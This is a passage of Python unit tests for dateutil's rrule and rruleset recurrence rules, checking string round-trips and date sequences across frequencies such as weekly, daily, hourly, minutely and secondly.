def testToStrWeeklyByEasterPos(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByEasterNeg(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByHour(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMinute(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyBySecond(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByHourAndMinute(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByHourAndSecond(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByHourAndMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyBySetPos(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byweekday=(TU, TH),
byhour=(6, 18),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDaily(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyInterval(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyIntervalLarge(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
interval=92,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonth(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonthDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonthAndMonthDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByWeekDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByNWeekDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonthAndWeekDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonthAndNWeekDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonthAndMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByYearDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByYearDayNeg(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonthAndYearDay(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=4,
bymonth=(1, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMonthAndYearDayNeg(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=4,
bymonth=(1, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByWeekNo(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByWeekNoAndWeekDay(self):
# That's a nice one. The first days of week number one
# may be in the last year.
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByWeekNoAndWeekDayLarge(self):
# Another nice test. The last days of week number 52/53
# may be in the next year.
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByWeekNoAndWeekDayLast(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByWeekNoAndWeekDay53(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByEaster(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByEasterPos(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByEasterNeg(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByHour(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMinute(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyBySecond(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByHourAndMinute(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByHourAndSecond(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyByHourAndMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrDailyBySetPos(self):
self._rrulestr_reverse_test(rrule(DAILY,
count=3,
byhour=(6, 18),
byminute=(15, 45),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourly(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyInterval(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyIntervalLarge(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
interval=769,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonth(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonthDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonthAndMonthDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByWeekDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByNWeekDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonthAndWeekDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonthAndNWeekDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonthAndMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByYearDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByYearDayNeg(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonthAndYearDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMonthAndYearDayNeg(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByWeekNo(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByWeekNoAndWeekDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByWeekNoAndWeekDayLarge(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByWeekNoAndWeekDayLast(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByWeekNoAndWeekDay53(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByEaster(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByEasterPos(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByEasterNeg(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByHour(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMinute(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyBySecond(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByHourAndMinute(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByHourAndSecond(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByHourAndMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyBySetPos(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byminute=(15, 45),
bysecond=(15, 45),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutely(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyInterval(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyIntervalLarge(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
interval=1501,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonth(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonthDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonthAndMonthDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByWeekDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByNWeekDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonthAndWeekDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonthAndNWeekDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonthAndMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByYearDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByYearDayNeg(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonthAndYearDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonthAndYearDayNeg(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByWeekNo(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByWeekNoAndWeekDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByWeekNoAndWeekDayLarge(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByWeekNoAndWeekDayLast(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByWeekNoAndWeekDay53(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByEaster(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByEasterPos(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByEasterNeg(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByHour(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMinute(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyBySecond(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByHourAndMinute(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByHourAndSecond(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByHourAndMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyBySetPos(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bysecond=(15, 30, 45),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondly(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyInterval(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyIntervalLarge(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
interval=90061,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonth(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonthDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonthAndMonthDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByWeekDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByNWeekDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonthAndWeekDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonthAndNWeekDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonthAndMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByYearDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByYearDayNeg(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonthAndYearDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonthAndYearDayNeg(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByWeekNo(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByWeekNoAndWeekDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByWeekNoAndWeekDayLarge(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByWeekNoAndWeekDayLast(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByWeekNoAndWeekDay53(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByEaster(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByEasterPos(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByEasterNeg(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByHour(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMinute(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyBySecond(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByHourAndMinute(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByHourAndSecond(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByHourAndMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByHourAndMinuteAndSecondBug(self):
# This explores a bug found by Mathieu Bridon.
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
bysecond=(0,),
byminute=(1,),
dtstart=datetime(2010, 3, 22, 12, 1)))
def testToStrWithWkSt(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
wkst=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrLongIntegers(self):
if not PY3: # There is no longs in python3
self._rrulestr_reverse_test(rrule(MINUTELY,
count=long(2),
interval=long(2),
bymonth=long(2),
byweekday=long(3),
byhour=long(6),
byminute=long(6),
bysecond=long(6),
dtstart=datetime(1997, 9, 2, 9, 0)))
self._rrulestr_reverse_test(rrule(YEARLY,
count=long(2),
bymonthday=long(5),
byweekno=long(2),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testReplaceIfSet(self):
rr = rrule(YEARLY,
count=1,
bymonthday=5,
dtstart=datetime(1997, 1, 1))
newrr = rr.replace(bymonthday=6)
self.assertEqual(list(rr), [datetime(1997, 1, 5)])
self.assertEqual(list(newrr),
[datetime(1997, 1, 6)])
def testReplaceIfNotSet(self):
rr = rrule(YEARLY,
count=1,
dtstart=datetime(1997, 1, 1))
newrr = rr.replace(bymonthday=6)
self.assertEqual(list(rr), [datetime(1997, 1, 1)])
self.assertEqual(list(newrr),
[datetime(1997, 1, 6)])
class RRuleSetTest(unittest.TestCase):
def testSet(self):
rrset = rruleset()
rrset.rrule(rrule(YEARLY, count=2, byweekday=TU,
dtstart=datetime(1997, 9, 2, 9, 0)))
rrset.rrule(rrule(YEARLY, count=1, byweekday=TH,
dtstart=datetime(1997, 9, 2, 9, 0)))
self.assertEqual(list(rrset),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testSetDate(self):
rrset = rruleset()
rrset.rrule(rrule(YEARLY, count=1, byweekday=TU,
dtstart=datetime(1997, 9, 2, 9, 0)))
rrset.rdate(datetime(1997, 9, 4, 9))
rrset.rdate(datetime(1997, 9, 9, 9))
self.assertEqual(list(rrset),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testSetExRule(self):
rrset = rruleset()
rrset.rrule(rrule(YEARLY, count=6, byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
rrset.exrule(rrule(YEARLY, count=3, byweekday=TH,
dtstart=datetime(1997, 9, 2, 9, 0)))
self.assertEqual(list(rrset),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testSetExDate(self):
rrset = rruleset()
rrset.rrule(rrule(YEARLY, count=6, byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
rrset.exdate(datetime(1997, 9, 4, 9))
rrset.exdate(datetime(1997, 9, 11, 9))
rrset.exdate(datetime(1997, 9, 18, 9))
self.assertEqual(list(rrset),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testSetExDateRevOrder(self):
rrset = rruleset()
rrset.rrule(rrule(MONTHLY, count=5, bymonthday=10,
dtstart=datetime(2004, 1, 1, 9, 0)))
rrset.exdate(datetime(2004, 4, 10, 9, 0))
rrset.exdate(datetime(2004, 2, 10, 9, 0))
self.assertEqual(list(rrset),
[datetime(2004, 1, 10, 9, 0),
